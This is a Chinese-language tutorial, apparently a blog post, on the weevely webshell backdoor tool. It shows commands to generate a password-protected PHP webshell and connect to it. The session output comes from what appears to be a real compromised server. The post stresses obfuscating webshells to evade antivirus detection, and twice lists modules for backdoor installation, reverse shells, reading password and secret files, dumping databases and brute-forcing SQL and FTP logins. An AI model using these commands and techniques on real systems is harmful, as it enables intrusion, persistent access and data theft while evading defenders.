weevely 是BT5中一個常用的webshell後門串連工具,它發揮的作用類似於中國菜刀(chopper)。
root@bt:/pentest/backdoors/web/weevely# ./weevely.py generate ices gen.php
// 產生一個密碼為 ices 的php webshell.
root@bt:/pentest/backdoors/web/weevely# ./weevely.py http://app.*.cn/common/gen.php ices
// ./weevely.py http://*.com/webshell.php [password] 串連
apache@HQEBWEBJ:/app/ecccs/web/common$ :system.info
// 按兩下 tab鍵,進入操控模式,例如輸入 system.info 獲得系統資訊
whoami: apache
hostname: HQEBWEBJ
basedir: /app/ecccs/web/common
uname: Linux HQEBWEBJ 2.6.18-92.el5 #1 SMP Tue Apr 29 13:16:15 EDT 2008 x86_64 GNU/Linux
os: Linux
document_root: /home/ecccs/web
safe_mode: 0
script: /common/gen.php
client_ip: 120.3*.56.156
max_execution_time: 30
php_self: /common/gen.php
apache@HQEBWEBJ:/app/ecccs/web/common$ cat /etc/issue
Red Hat Enterprise Linux Server release 5.2 (Tikanga) Kernel
// 執行一般的命令
加密功能
冷冷的夜提取了weevely的php加密模組 (其實這才是本文的亮點,用來免殺webshell)
$ python test.py 原.php 密.php
如,加密後的php一句話webshell代碼中,只出現了str_replace這個熟知的函數,未出現其他關鍵字,這要查殺是非常難滴。
功能模組
系統 system.info //收集系統資訊 檔案 file.read //讀檔案 file.upload //上傳本地檔案 file.check //檢查檔案的許可權和 file.enum //在本地詞表的書面枚舉遠程檔案 file.download //下載遠程二進位/ ASCII檔案到本地 SQL sql.query //執行SQL查詢 sql.console //啟動SQL控制台 sql.dump //擷取SQL資料庫轉儲 sql.summary //擷取SQL資料庫中的表和列 後門 backdoor.tcp //TCP連接埠後門 backdoor.install //安裝後門 backdoor.reverse_tcp //反彈 枚舉 audit.user_files //在使用者家中列舉常見的機密檔案 audit.user_web_files //列舉常見的Web檔案 audit.etc_passwd //枚舉/etc/passwd 尋找 find.webdir //尋找可寫的web目錄 find.perm //尋找許可權可讀/寫/可執行檔和目錄 find.name //按名稱尋找檔案和目錄 find.suidsgid //尋找SUID / SGID檔案和目錄 暴破 bruteforce.sql //暴力破解單一SQL使用者 bruteforce.sql_users //暴力破解SQL密碼 bruteforce.ftp // 暴力破解單一FTP使用者 bruteforce.ftp_users //暴力破解FTP密碼 系統 system.info //收集系統資訊 檔案 file.read //讀檔案 file.upload //上傳本地檔案 file.check //檢查檔案的許可權和 file.enum //在本地詞表的書面枚舉遠程檔案 file.download //下載遠程二進位/ ASCII檔案到本地 SQL sql.query //執行SQL查詢 sql.console //啟動SQL控制台 sql.dump //擷取SQL資料庫轉儲 sql.summary //擷取SQL資料庫中的表和列 後門 backdoor.tcp //TCP連接埠後門 backdoor.install //安裝後門 backdoor.reverse_tcp //反彈 枚舉 audit.user_files //在使用者家中列舉常見的機密檔案 audit.user_web_files //列舉常見的Web檔案 audit.etc_passwd //枚舉/etc/passwd 尋找 find.webdir //尋找可寫的web目錄 find.perm //尋找許可權可讀/寫/可執行檔和目錄 find.name //按名稱尋找檔案和目錄 find.suidsgid //尋找SUID / SGID檔案和目錄 暴破 bruteforce.sql //暴力破解單一SQL使用者 bruteforce.sql_users //暴力破解SQL密碼 bruteforce.ftp // 暴力破解單一FTP使用者 bruteforce.ftp_users //暴力破解FTP密碼
weevely–linux中的菜刀